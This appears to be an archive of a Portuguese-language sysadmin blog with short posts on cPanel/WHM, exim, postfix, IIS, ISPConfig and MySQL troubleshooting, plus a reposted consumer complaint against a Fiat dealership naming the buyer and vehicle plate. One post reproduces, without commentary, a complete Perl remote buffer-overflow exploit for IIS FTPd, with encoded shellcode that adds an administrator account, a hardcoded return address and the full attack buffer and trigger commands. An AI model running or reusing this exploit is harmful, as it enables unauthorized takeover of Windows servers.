Tema STABLE do cpanel não permite usar nenhum menu, nem listagem de emails, nem qualquer formulário do whm

Standard

Ontem a cpanel, com o auto update (setado no crontab, podendo ser visto com crontab -e) apresentou sérios problemas em suas templates, mesmo em versões de update Stable.

A saída para sanar este problema está nas 2 formas abaixo:

 

1 – Entre no console e digite /scripts/upcp –force e espere terminar, caso não resolva vá ao ponto 2:

2 – Entre no WHM, vá em update e escolha CURRENT, assim que salvar o WHM vai sugerir que dê update (só que não funciona o update now, rsrsrs, é um form bugado), entre novamente no console e digite /scripts/upcp –force, este sim é garantido.

WHM sumiu com meus ips adicionados anteriormente e ao tentar adicionar novamente aparece a mensagem is already…

Standard

Calma, sem problemas.
Se conseguir entre como root e rode o seguinte comando:

 

/etc/rc.d/init.d/ipaliases restart

Depois veja no whm se os ips voltaram, caso ainda assim não tenha retornado rode
chkconfig --list ipaliases

Verifique também (caso os comando acima não sanem seu problema) os arquivos:

/etc/ips e /etc/ipaddrpool

Abraços.

 

FIAT + FIORI – UMA PARCERIA DE BABACAS FOREVER ALONE

Standard

A concessionária Fiori, revendedora da linha Fiat em João Pessoa, comercializou em dezembro de 2011 um veículo ‘Novo Palio’, modelo 2012, de placas OFB-7139-PB, com falhas ao cliente José Fernando Santos de Carvalho.

De acordo com o comprador, dois dias após a aquisição do veículo, começaram os intermináveis problemas. Inicialmente, o veículo não deu partida, ou seja, quando a chave de ignição era acionada, o painel não acendia e o carro não ligava o motor.

Indignação
“Procurei a Fiori para solucionar o problema e ‘eles’ (Fiori) não detectaram nenhuma anomalia, informando que o carro estava em perfeitas condições de uso. No entanto, o problema persistiu e eu retornei diversas vezes na concessionária para relatar a mesma anomalia, além de outros tantos, como um alarme de velocidade excedida sem que o veículo estivesse em tal condição. Houve travamento de porta-malas, ponteiro pulando, computador de bordo todo sem regulagem, entre outros problemas”, disse José Fernando.

Medo
O consumidor prejudicado teme pela sua vida e da sua família. Ele revelou que por conta de sua vida profissional, necessita  viajar constantemente. “Eu não posso nem me arriscar, pois não confio mais no Palio que adquiri na Fiori. Vou procurar meus direitos e tenho fé que tudo será resolvido”, desabafou José Fernando.

O outro lado

A reportagem do Paraíba Já entrou em contato com a Fiori, pelo 3208-1512, porém, a ligação passou por diversos ramais e acabou sendo desligada.

Paraíba Já

 

 

=============

 

http://paraibaja.com.br/?p=noticia_int&id=19509

 

Defeito de fábrica em Novo Palio 2012 e o descaso da FIAT

Nos ultimos 3 meses e meio, tenho retornado à Concessionária Fiat varias vezes. O fato é que comprei um carro(NOVO PALIO 2012) com anomalias, que eles nao conseguem resolver. Eles alegam: “O carro está em perfeitas condicoes de uso”.

Pasmem, ja experimentei porta-malas eletrico travado(no dia que ia viajar para ser padrinho de casamento), computador de bordo informando problemas no motor, dificuldades pra ligar o carro, ponteiro do velocimetro “PULANDO”, cortes na ingestão de combustível enquanto em movimento, controle das portas não respondendo e outras falhas na entrega do produto(direção desalinhada, risco no painel, peças alteradas).

Eu ja não aguento mais relatar o problema a empresa ou ficar vários dias à pés, por deixar o carro na Concessionária. Passo por diversos transtornos e incovenientes.

Tenho um filho de 1 ano. Todo pai sabe que “é lei”, chegar em casa e dar uma voltar na rua com o bebe pra ele nao chorar.Ficar se o unico carro da familia é MUITO PROBLEMATICO.

Faço viagems constantes à refice-PE, devido ao meu mestrado na UFPE e tenho MEDO DA INTEGRIDADE FISICA DA MINHA FAMILIA.

Sugiro que NÃO COMPREM VEICULOS FIAT, É JOGAR DADOS COM A SORTE. se o carro sair bem, ok, senão, vc ESTARÁ NO PREJUIZO (FATO).

 

Como forçar fila de entrega do exim (tricks) comandos úteis do exim

Standard

Abaixo descrevo uma pequena lista de comandos bem úteis do cpanel:

exim -bp —-> Este comando recebe os IDs das mensagens relevantes que você precisa enviar (na verdade as que estão na fila de emails),
exim -M IDdoEmaildaFiladeEMAILS —-> Com o id somado a este comando você envia um email em específico em caráter imediato ;).
exim -qf —-> envia a fila de emails toda,
exim -qff —-> esse comando ordena que emails congelados tenham uma ordem de envio imediato,
exim -Mvl IDdoEmaildaFiladeEMAILS —-> Vê o log da mensagem especificada pelo seu respectivo ID,
exim -Mvb IDdoEmaildaFiladeEMAILS —-> Mostra o corpo da mensagem referenciada por seu ID,
exim -Mvh IDdoEmaildaFiladeEMAILS —-> Mostra o cabeçalho da mensagem ordenada por seu ID,
exim -Mrm IDdoEmaildaFiladeEMAILS —> Remove a mensagem especificada por seu ID,
exim -Mg —> prepara mensagens para o envio usando seu ID (mensagens que falharam).

exim -v -Rff nomedodomínio.com.br —-> Esse comando faz com que o exim processe todas as mensagens de um domínio específico, neste caso nomedodomínio.com.br.

Service Unavailable HTTP Error 503 – Coisas que só o IIS pode “proporcionar” a você

Standard

Das coisas que mais me irritam a mais especial é a falta de logs precisos por parte do sistema operacional. Em se tratando de Microsoft aí é que a coisa pega e pega FEIO!

Um dos erros que me fizeram gastar aproximadamente 8 horas de troubleshooting foi o erro Service Unavailable HTTP Error 503. Das coisas que mais se alegam são:

– Chaves pré-definidas junto aos serviços do IIS:
http://blogs.iis.net/webtopics/archive/2010/02/17/a-not-so-common-root-cause-for-503-service-unavailable.aspx
e
http://blogs.msdn.com/b/drnick/archive/2006/10/16/configuring-http-for-windows-vista.aspx

– Contas sem autoridade junto ao IIS:
http://social.msdn.microsoft.com/Forums/en/mdmsetup/thread/4689da4a-0452-45b6-bbb4-21ccb76d8ff9

– IIS operando com recursos de 32 bits em plataformas 64 bits:
http://forums.asp.net/p/1502755/3560390.aspx

– IIS com “loucuras” que só Deus para não duvidar:
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/55f71614-ef1b-4015-b9c8-a42c1e700c25.mspx?mfr=true

– Falaram que pode ser algum sysadmin modificando algo, por isso o downtime:
http://www.checkupdown.com/status/E503_pt.html
http://technet.microsoft.com/pt-br/library/cc736325%28WS.10%29.aspx

Caso você tenha “passado” pelos pontos acima e nenhum deles “sanou” seu problema, e além disso, você tem CERTEZA de que sua appweb está 100% depurada, debug 100% ok, tudo filé, e ainda tem CERTEZA que nenhum admin andou fazendo besteira em seu servidor, a saída pode ser alcançada da seguinte forma:

1 – Observe se existe alguma tabela corrompida em suas consultas SQL na appweb (caso consiga – detalhe, foi meu caso com BDs do tipo Mysql).
2 – Permissões em arquivos remotos ou tempo de resposta a tais chamadas.

Perceba que não é erro em nada de configuração, servidor e etc (evite loucuras como as minhas de tuning, pensando que era um erro de alto processamento, i/o e etc).

Normalmente os logs ineficientes (ex: 503 “n/a” nome do POOL_com_paranente_problema) do IIS falam que o pool de aplicativos “XXX” (nome que você deu ao pool) para rodar aplicativos DOTNET expirou/expulso/estuprou/estrangulou e etc a requisição (quer seja por POST ou GET). (na pasta logfiles dentro de windows – aonde o iis guarda seus logs)
O mais top dos erros:

1. “Connection_Dropped DefaultAppPool”
2. “Connection_Abandoned_By_AppPool DefaultAppPool”

Mesmo que você venha utilizar-se do software de debug que a MS tem, sinto muito em lhe avisar, mas será em vão utilizar-se tal ferramenta!
Siga os meus conselhos nas linhas em negrito, aquilo ali pode salvar seu dia. Use um frontend para executar suas querys e ver se não estão ali as saídas.

Ferramenta: http://support.microsoft.com/kb/919792/

Ispconfig 2: how to create a park domain – como deixar um domínio acessar o conteúdo do outro como park no ispconfig

Standard

Uma das coisas mais interessantes no IspConfig é sua capacidade de permitir customizações em tudo que você possa imaginar. Aproveitando esta “boquinha” vamos fazer algo diferente.
Parkear domínios no Parallels Plesk e no Whm/CPanel é coisa fácil, pois tudo é automatizado, mas isto não quer dizer que o bom e velho vim (ou qualquer OUTRO EDITOR) não entre em ação.

Para isto, precisamos logar-nos como root no servidor aonde iremos parkear domínios, e devemos (antes de mais nada) fazer backup do arquivo de configuração do apache, sendo assim use o comando:

cp -rp /etc/httpd/conf/httpd.conf /root/httpd.conf.OLD


Temos então um arquivo garantido para que, em qualquer eventualidade sirva para consulta ou possivelmente correção do arquivo mais recente.

Entremos no arquivo de configuração:

vim /etc/httpd/conf/httpd.conf

Vá para o final do arquivo e localize exatamente este trecho:


Options ExecCGI -Indexes
AllowOverride None
AllowOverride Indexes AuthConfig Limit FileInfo
Order allow,deny
Allow from all

Deny from all

Feito isto, o que devemos fazer é simples.
Sabendo-se que o ISPConfig lê um outro arquivo com os vhosts dos usuários web, devemos antecipar nossa configuração de maneira que a linha do ispconfig fique abaixo do nosso vhost.

Acima da linha com a informação:

Include /etc/httpd/conf/vhosts/Vhosts_ispconfig.conf

Devemos fazer algo assim:

ServerName www.nomedodominioparkeado.com:80
ServerAdmin webmaster@dominiodestino.com.br
DocumentRoot /var/www/web100/web
ServerAlias dominiodestino.com.br
DirectoryIndex index.html index.htm index.php index.php5 index.php4 index.php3 index.shtml index.cgi index.pl index.jsp Default.htm default.htm
Alias /cgi-bin/ /var/www/web100/cgi-bin/
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
ErrorLog /var/www/web100/log/error.log
AddType application/x-httpd-php .php .php3 .php4 .php5
php_admin_flag safe_mode On
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
Alias /stats “/var/www/web100/web/webalizer”
Alias /error/ “/var/www/web100/web/error/”
ErrorDocument 400 /error/invalidSyntax.html
ErrorDocument 401 /error/authorizationRequired.html
ErrorDocument 403 /error/forbidden.html
ErrorDocument 404 /error/fileNotFound.html
ErrorDocument 405 /error/methodNotAllowed.html
ErrorDocument 500 /error/internalServerError.html
ErrorDocument 503 /error/overloaded.html
AliasMatch ^/~([^/]+)(/(.*))? /var/www/web100/user/$1/web/$3
AliasMatch ^/users/([^/]+)(/(.*))? /var/www/web100/user/$1/web/$3

RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* – [F]

Perceba que no começo falei XXX.XXX.XXX.XXX, isto refere-se ao ip do seu dedicado (shared ip dos domínios :P)

Por este vhost pegue a coisa em cheio.

A charada está nas linhas:

ServerName www.nomedodominioparkeado.com:80
ServerAdmin webmaster@dominiodestino.com.br
DocumentRoot /var/www/web100/web
ServerAlias dominiodestino.com.br

1 – indica o parkeamento
2 – email do main domain
3 – arquivos web de onde o parkeamento vai ler assim que o internauta acessar a página www.nomedodominioparkeado.com
4 – indica o destino do parkeamento, ou seja, ao acessar www.nomedodominioparkeado.com a pessoa na realidade acessa dominiodestino.com.br, porém tendo no cabeçalho o nome www.nomedodominioparkeado.com (url de entrada no navegador)


OBS: CASO O ARTIGO NÃO EXIBA AS TAGS DO APACHE, POR FAVOR VERIFIQUEM JUNTO AO ARQUIVO /ETC/HTTPD/CONF/HTTPD.CONF.

Abraços e espero ter contribuído com um dia feliz para nós… lol.
bye!

create user output file. Command output: procmail: Error while writing to /var/mail…

Standard

create user output file. Command output: procmail: Error while writing to /var/mail…

Se esta é a mensagem de erro que vem no outlook que de quem está enviando um email para um destinatário que usa postfix seus problemas “SE ACABARAM-SE”.

Entre no console e como root e digite:

postconf -e 'mailbox_size_limit = 0'

Provavelmente é a quota ferrada e este comando te tira da forca :D.

Sistemas afetados: Debian, Ubuntu (lucid lynx, karmic…), Centos 5.5, Centos 5.4…

Smtp Error: The Following Recipients Failed: SMTP Error: The following recipients failed

Standard

Bem, se você usa o GOOGLE APPS e está tentando enviar um email de dentro de um servidor com POSTFIX e o mesmo não envia nada e ainda apresenta o erro do título, nada de pânico, o que ocorre:

1 – Email vai sair do servidor mas antes lê a lista de hosts locais dentro do arquivo /etc/postfix/main.cf na linha:
mydestination
2 – Quando o domínio tenta enviar para o outro domínio que provavelmente está citado ali, pimba! Fala que o destinatário falhou por não existir.

Como corrigir?

Remova o domínio do destinatário dali e seja feliz!

Exploit para o IIS 6 (FTPD) – BOF

Standard

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl \n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Como aumentar quantidade de falhas no lfd (csf) para erros de login e senha no whm cpanel

Standard

Para quem usa CSF e deseja aumentar a quantidade de tentativas de acesso no firewall antes que ele dê um lock no ip, basta acessar o arquivo de configuração do CSF e modificar a quantidade de tentativas em:

LF_SSHD = para tentativas ssh,

LF_FTPD = para tentativas ftp,

LF_SMTPAUTH = para tentativas smtp,

LF_POP3D = para tentativas pop,

LF_IMAPD = para tentativas imap,

LF_HTACCESS = para tentativas de acesso por htaccess.
Informe valores numéricos após o  =

Abraços.

Verificar Spammer no exim – Vamos combater o SPAM

Standard

Uma coisa importante a ser adicionada ao sistema EXIM são as informações no cabeçalho dos emails enviados/recebidos em seu sistema.

Com etas informações você poderá mais facilmente identificar os possíveis SPAMMERS que você hospeda além de facilitar também a vida de outros administradores cujo servidores recebem emails vindos de seu sistema.

Acesse o WHM e no link “Exim Configuration Editor” e no mesmo no botão “Advanced Editor”. Logo no primeiro campo de formulário (logo abaixo do “#!!# cPanel Exim 4 Config”) adicione:

log_selector = +address_rewrite +all_parents +arguments +connection_reject +delay_delivery +delivery_size +dnslist_defer +incoming_interface +incoming_port +lost_incoming_connection +queue_run +received_sender +received_recipients +retry_defer +sender_on_delivery +size_reject +skip_delivery +smtp_confirmation +smtp_connection +smtp_protocol_error +smtp_syntax_error +subject +tls_cipher +tls_peerdn

Agora observe o cabeçalho dos emails em seu queue.

fonte: http://blog.scriptseguro.com.br/verificar-spammer-no-exim/

como Meu servidor não requer autenticação whm cpanel como forçar autenticação de email how to force mail authentication

Standard

Nada de pânico, entre no console como root e digite o seguinte comando:

/usr/local/cpanel/bin/tailwatchd –enable=Cpanel::TailWatch::Antirelayd

😀

fonte: http://littleoak.wordpress.com/2009/08/01/meu-servidor-nao-requer-autenticacao-whm-cpanel-como-forcar-autenticacao-de-email-how-to-force-mail-authentication/

Starting MySQL.Manager of pid-file quit without updating fi[FAILED]

Standard

Se você não consegue fazer nada no mysql e o bandido ainda assim só lhe diz:

Starting MySQL.Manager of pid-file quit without updating fi[FAILED]

Nada de pânico, para resolver isto use os comandos abaixo:

cd /var/lib/mysql/mysql
myisamchk -r *.MYI

Após, service mysql start.

Fonte: http://littleoak.wordpress.com/2009/08/27/starting-mysql-manager-of-pid-file-quit-without-updating-fifailed/

Erro 111 na tentativa de envio de webmail pelo cpanel

Standard

Se você tenta acessar sua conta de email (e até consegue) via webmail (em seu cpanel), mas na hora de enviar uma mensagem o erro que aparece é o erro 111, NADA DE PÂNICO, mister little lhe dá a resposta bem mastigadinha!

1 – acesse o servidor, logando-se como root execute o comando abaixo:

/scripts/mailperm –force

Este problema ocorre (normalmente) ou porque a conta de email Não exise mais ou porque a mesma perdeu privilégios no gestor do exim.

Abraços!

fonte: http://littleoak.wordpress.com/2009/09/01/erro-111-na-tentativa-de-envio-de-webmail-pelo-cpanel/

Problema na instalação ou Uso do IonCube no Plesk Linux

Standard

Para localizar o problema com o IonCube no plesk basta rodar o comando abaixo:

grep -iR ioncube /etc/php*
/etc/php.d/ioncube.ini:zend_extension=/usr/lib/php/ioncube/ioncube_loader_lin_5.2.so
/etc/php.d/ioncube-loader.ini:zend_extension=/usr/lib/php/modules//php_ioncube_loader_lin_5.1.so

Pegue o segundo valor e comente ele, ou seja, vim /etc/php.d/ioncube-loader.ini e na linha coloca ; antes de tudo, isto deixará desabilitado.

Após use

php -v e verá que o seu plesk está ok.